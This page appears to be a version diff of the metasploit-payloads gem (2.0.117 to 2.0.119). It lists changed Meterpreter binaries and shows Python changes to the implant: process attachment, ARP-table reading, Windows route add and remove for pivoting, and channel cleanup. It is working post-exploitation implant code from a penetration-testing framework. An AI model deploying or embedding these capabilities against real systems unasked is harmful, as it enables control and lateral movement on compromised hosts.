metasploit-payloads 2.0.117 → 2.0.119
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/data/android/meterpreter.jar +0 -0
- data/data/android/metstage.jar +0 -0
- data/data/android/shell.jar +0 -0
- data/data/meterpreter/elevator.x64.debug.dll +0 -0
- data/data/meterpreter/elevator.x64.dll +0 -0
- data/data/meterpreter/elevator.x86.debug.dll +0 -0
- data/data/meterpreter/elevator.x86.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.py +108 -13
- data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
- data/data/meterpreter/meterpreter.py +27 -25
- data/data/meterpreter/metsrv.x64.debug.dll +0 -0
- data/data/meterpreter/metsrv.x64.dll +0 -0
- data/data/meterpreter/metsrv.x86.debug.dll +0 -0
- data/data/meterpreter/metsrv.x86.dll +0 -0
- data/data/meterpreter/screenshot.x64.debug.dll +0 -0
- data/data/meterpreter/screenshot.x64.dll +0 -0
- data/data/meterpreter/screenshot.x86.debug.dll +0 -0
- data/data/meterpreter/screenshot.x86.dll +0 -0
- data/lib/metasploit-payloads/version.rb +1 -1
- data.tar.gz.sig +0 -0
- metadata +2 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: b67e513ed92128da0555d06d5700100438229971a8750aefac72059efec74eb8
|
4
|
+
data.tar.gz: 90a3af70071ac13b8b29db40a47868c5221361e14ad21aec997d1cfb52634d03
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: c961adbd35fd2999240f21e45383fa2ebd11edae361b65858361989ca32decc61d79b0259dcc0892ec65d714baed184f00d16499a6c4d5454599d268511c90ae
|
7
|
+
data.tar.gz: 7d90eebd468b2f28d536d395e62a29a4f1f342a72fa7141f2c4816887331e7cd5cea21906f8c717fb2b056f09fe316091171ba64170c728f87e7086773e7e95c
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
Binary file
|
data/data/android/metstage.jar
CHANGED
Binary file
|
data/data/android/shell.jar
CHANGED
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
@@ -1002,6 +1002,9 @@ def getaddrinfo_from_request(request, socktype, proto):
|
|
1002
1002
|
local_address_info = None
|
1003
1003
|
return peer_address_info, local_address_info
|
1004
1004
|
|
1005
|
+
def addr_atoi4(address):
|
1006
|
+
return struct.unpack('!I', socket.inet_aton(address))[0]
|
1007
|
+
|
1005
1008
|
def netlink_request(req_type, req_data):
|
1006
1009
|
# See RFC 3549
|
1007
1010
|
NLM_F_REQUEST = 0x0001
|
@@ -1336,6 +1339,28 @@ def stdapi_sys_config_sysinfo(request, response):
|
|
1336
1339
|
response += tlv_pack(TLV_TYPE_ARCHITECTURE, get_system_arch())
|
1337
1340
|
return ERROR_SUCCESS, response
|
1338
1341
|
|
1342
|
+
@register_function_if(has_windll)
|
1343
|
+
def stdapi_sys_process_attach(request, response):
|
1344
|
+
pid = packet_get_tlv(request, TLV_TYPE_PID)['value']
|
1345
|
+
if not pid:
|
1346
|
+
GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
|
1347
|
+
GetCurrentProcess.restype = ctypes.c_void_p
|
1348
|
+
handle = GetCurrentProcess()
|
1349
|
+
else:
|
1350
|
+
inherit = packet_get_tlv(request, TLV_TYPE_INHERIT)['value']
|
1351
|
+
permissions = packet_get_tlv(request, TLV_TYPE_PROCESS_PERMS)['value']
|
1352
|
+
|
1353
|
+
OpenProcess = ctypes.windll.kernel32.OpenProcess
|
1354
|
+
OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_bool, ctypes.c_uint32]
|
1355
|
+
OpenProcess.restype = ctypes.c_void_p
|
1356
|
+
handle = OpenProcess(permissions, inherit, pid)
|
1357
|
+
if not handle:
|
1358
|
+
return error_result_windows(), response
|
1359
|
+
meterpreter.processes[handle] = None
|
1360
|
+
debug_print('[*] added process id: ' + str(pid) + ', handle: ' + str(handle))
|
1361
|
+
response += tlv_pack(TLV_TYPE_HANDLE, handle)
|
1362
|
+
return ERROR_SUCCESS, response
|
1363
|
+
|
1339
1364
|
@register_function
|
1340
1365
|
def stdapi_sys_process_close(request, response):
|
1341
1366
|
proc_h_id = packet_get_tlv(request, TLV_TYPE_HANDLE)['value']
|
@@ -1901,19 +1926,22 @@ def stdapi_net_config_get_arp_table(request, response):
|
|
1901
1926
|
if not os.path.exists(arp_cache_file):
|
1902
1927
|
return ERROR_NOT_SUPPORTED, response
|
1903
1928
|
|
1904
|
-
|
1905
|
-
|
1906
|
-
|
1907
|
-
|
1908
|
-
|
1909
|
-
|
1910
|
-
|
1911
|
-
|
1912
|
-
|
1913
|
-
|
1914
|
-
|
1915
|
-
|
1916
|
-
|
1929
|
+
arp_cache = open('/proc/net/arp', 'r')
|
1930
|
+
lines = arp_cache.readlines()
|
1931
|
+
for line in lines[1:]:
|
1932
|
+
fields = line.split()
|
1933
|
+
ip_address = fields[0]
|
1934
|
+
mac_address = fields[3]
|
1935
|
+
mac_address = bytes().join(binascii.unhexlify(h) for h in mac_address.split(':'))
|
1936
|
+
interface_name = fields[5]
|
1937
|
+
arp_tlv = bytes()
|
1938
|
+
arp_tlv += tlv_pack(TLV_TYPE_IP, socket.inet_aton(ip_address))
|
1939
|
+
arp_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, mac_address)
|
1940
|
+
arp_tlv += tlv_pack(TLV_TYPE_MAC_NAME, interface_name)
|
1941
|
+
response += tlv_pack(TLV_TYPE_ARP_ENTRY, arp_tlv)
|
1942
|
+
arp_cache.close()
|
1943
|
+
else:
|
1944
|
+
return ERROR_NOT_SUPPORTED, response
|
1917
1945
|
return ERROR_SUCCESS, response
|
1918
1946
|
|
1919
1947
|
@register_function
|
@@ -2124,6 +2152,73 @@ def stdapi_net_config_get_routes(request, response):
|
|
2124
2152
|
response += tlv_pack(TLV_TYPE_NETWORK_ROUTE, route_tlv)
|
2125
2153
|
return ERROR_SUCCESS, response
|
2126
2154
|
|
2155
|
+
def _win_route_add_remove(is_add, request, response):
|
2156
|
+
class IPAddr(ctypes.Structure):
|
2157
|
+
_fields_ = [
|
2158
|
+
("S_addr", ctypes.c_ulong)]
|
2159
|
+
|
2160
|
+
MIB_IPROUTE_TYPE_INDIRECT = 4
|
2161
|
+
MIB_IPPROTO_NETMGMT = 3
|
2162
|
+
|
2163
|
+
GetBestInterface = ctypes.windll.Iphlpapi.GetBestInterface
|
2164
|
+
GetBestInterface.argtypes = [IPAddr, ctypes.POINTER(ctypes.c_ulong)]
|
2165
|
+
GetBestInterface.restype = ctypes.c_ulong
|
2166
|
+
|
2167
|
+
CreateIpForwardEntry = ctypes.windll.Iphlpapi.CreateIpForwardEntry
|
2168
|
+
CreateIpForwardEntry.argtypes = [PMIB_IPFORWARDROW]
|
2169
|
+
CreateIpForwardEntry.restype = ctypes.c_ulong
|
2170
|
+
|
2171
|
+
DeleteIpForwardEntry = ctypes.windll.Iphlpapi.DeleteIpForwardEntry
|
2172
|
+
DeleteIpForwardEntry.argtypes = [PMIB_IPFORWARDROW]
|
2173
|
+
DeleteIpForwardEntry.restype = ctypes.c_ulong
|
2174
|
+
|
2175
|
+
GetIpInterfaceEntry = ctypes.windll.Iphlpapi.GetIpInterfaceEntry
|
2176
|
+
GetIpInterfaceEntry.argtypes = [ctypes.POINTER(MIB_IPINTERFACE_ROW)]
|
2177
|
+
GetIpInterfaceEntry.restype = ctypes.c_ulong
|
2178
|
+
|
2179
|
+
subnet = packet_get_tlv(request, TLV_TYPE_SUBNET_STRING)['value']
|
2180
|
+
netmask = packet_get_tlv(request, TLV_TYPE_NETMASK_STRING)['value']
|
2181
|
+
gateway = packet_get_tlv(request, TLV_TYPE_GATEWAY_STRING)['value']
|
2182
|
+
|
2183
|
+
route = MIB_IPFORWARDROW()
|
2184
|
+
route.dwForwardDest = socket.ntohl(addr_atoi4(subnet))
|
2185
|
+
route.dwForwardMask = socket.ntohl(addr_atoi4(netmask))
|
2186
|
+
route.dwForwardNextHop = socket.ntohl(addr_atoi4(gateway))
|
2187
|
+
route.dwForwardType = MIB_IPROUTE_TYPE_INDIRECT
|
2188
|
+
route.dwForwardProto = MIB_IPPROTO_NETMGMT
|
2189
|
+
route.dwForwardAge = -1
|
2190
|
+
route.dwForwardMetric1 = 0
|
2191
|
+
|
2192
|
+
best_iface = ctypes.c_ulong()
|
2193
|
+
ip_addr = IPAddr(socket.ntohl(addr_atoi4(subnet)))
|
2194
|
+
result = GetBestInterface(ip_addr, ctypes.byref(best_iface))
|
2195
|
+
if result != ERROR_SUCCESS:
|
2196
|
+
return error_result_windows(result), response
|
2197
|
+
route.dwForwardIfIndex = best_iface
|
2198
|
+
|
2199
|
+
iface = MIB_IPINTERFACE_ROW(Family=WIN_AF_INET, InterfaceIndex=route.dwForwardIfIndex)
|
2200
|
+
result = GetIpInterfaceEntry(ctypes.byref(iface))
|
2201
|
+
if result != ERROR_SUCCESS:
|
2202
|
+
return error_result_windows(result), response
|
2203
|
+
route.dwForwardMetric1 = iface.Metric
|
2204
|
+
|
2205
|
+
if is_add:
|
2206
|
+
result = CreateIpForwardEntry(ctypes.byref(route))
|
2207
|
+
else:
|
2208
|
+
result = DeleteIpForwardEntry(ctypes.byref(route))
|
2209
|
+
if result != ERROR_SUCCESS:
|
2210
|
+
return error_result_windows(result), response
|
2211
|
+
|
2212
|
+
return ERROR_SUCCESS, response
|
2213
|
+
|
2214
|
+
@register_function_if(has_windll)
|
2215
|
+
def stdapi_net_config_add_route(request, response):
|
2216
|
+
return _win_route_add_remove(True, request, response)
|
2217
|
+
|
2218
|
+
@register_function_if(has_windll)
|
2219
|
+
def stdapi_net_config_remove_route(request, response):
|
2220
|
+
return _win_route_add_remove(False, request, response)
|
2221
|
+
|
2127
2222
|
def stdapi_net_config_get_routes_via_netlink():
|
2128
2223
|
rta_align = lambda l: l+3 & ~3
|
2129
2224
|
responses = netlink_request(RTM_GETROUTE, RTMSG(family=socket.AF_UNSPEC))
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
@@ -1259,6 +1259,21 @@ class PythonMeterpreter(object):
|
|
1259
1259
|
self.next_channel_id += 1
|
1260
1260
|
return idx
|
1261
1261
|
|
1262
|
+
def close_channel(self, channel_id):
|
1263
|
+
if channel_id not in self.channels:
|
1264
|
+
return False
|
1265
|
+
channel = self.channels[channel_id]
|
1266
|
+
try:
|
1267
|
+
channel.close()
|
1268
|
+
except Exception:
|
1269
|
+
debug_traceback('[-] failed to close channel id: ' + str(channel_id))
|
1270
|
+
return False
|
1271
|
+
del self.channels[channel_id]
|
1272
|
+
if channel_id in self.interact_channels:
|
1273
|
+
self.interact_channels.remove(channel_id)
|
1274
|
+
debug_print('[*] closed and removed channel id: ' + str(channel_id))
|
1275
|
+
return True
|
1276
|
+
|
1262
1277
|
def add_process(self, process):
|
1263
1278
|
if has_windll:
|
1264
1279
|
PROCESS_ALL_ACCESS = 0x1fffff
|
@@ -1274,37 +1289,24 @@ class PythonMeterpreter(object):
|
|
1274
1289
|
return handle
|
1275
1290
|
|
1276
1291
|
def close_process(self, proc_h_id):
|
1277
|
-
|
1278
|
-
if not proc_h:
|
1292
|
+
if proc_h_id not in self.processes:
|
1279
1293
|
return False
|
1280
|
-
|
1281
|
-
|
1282
|
-
|
1283
|
-
|
1284
|
-
|
1285
|
-
|
1286
|
-
|
1294
|
+
proc_h = self.processes.pop(proc_h_id)
|
1295
|
+
if proc_h:
|
1296
|
+
# proc_h is only set when we started the process via execute and not when we attached to it
|
1297
|
+
for channel_id, channel in self.channels.items():
|
1298
|
+
if not isinstance(channel, MeterpreterProcess):
|
1299
|
+
continue
|
1300
|
+
if not channel.proc_h is proc_h:
|
1301
|
+
continue
|
1302
|
+
self.close_channel(channel_id)
|
1303
|
+
break
|
1287
1304
|
if has_windll:
|
1288
1305
|
CloseHandle = ctypes.windll.kernel32.CloseHandle
|
1289
1306
|
CloseHandle.argtypes = [ctypes.c_void_p]
|
1290
1307
|
CloseHandle.restype = ctypes.c_long
|
1291
1308
|
CloseHandle(proc_h_id)
|
1292
|
-
debug_print('[*] closed and removed process
|
1293
|
-
return True
|
1294
|
-
|
1295
|
-
def close_channel(self, channel_id):
|
1296
|
-
if channel_id not in self.channels:
|
1297
|
-
return False
|
1298
|
-
channel = self.channels[channel_id]
|
1299
|
-
try:
|
1300
|
-
channel.close()
|
1301
|
-
except Exception:
|
1302
|
-
debug_traceback('[-] failed to close channel id: ' + str(channel_id))
|
1303
|
-
return False
|
1304
|
-
del self.channels[channel_id]
|
1305
|
-
if channel_id in self.interact_channels:
|
1306
|
-
self.interact_channels.remove(channel_id)
|
1307
|
-
debug_print('[*] closed and removed channel id: ' + str(channel_id))
|
1309
|
+
debug_print('[*] closed and removed process handle: ' + str(proc_h_id))
|
1308
1310
|
return True
|
1309
1311
|
|
1310
1312
|
def get_packet(self):
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
data.tar.gz.sig
CHANGED
Binary file
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: metasploit-payloads
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 2.0.
|
4
|
+
version: 2.0.119
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- OJ Reeves
|
@@ -96,7 +96,7 @@ cert_chain:
|
|
96
96
|
EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
|
97
97
|
9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
|
98
98
|
-----END CERTIFICATE-----
|
99
|
-
date: 2023-03-
|
99
|
+
date: 2023-03-07 00:00:00.000000000 Z
|
100
100
|
dependencies:
|
101
101
|
- !ruby/object:Gem::Dependency
|
102
102
|
name: rake
|
metadata.gz.sig
CHANGED
Binary file
|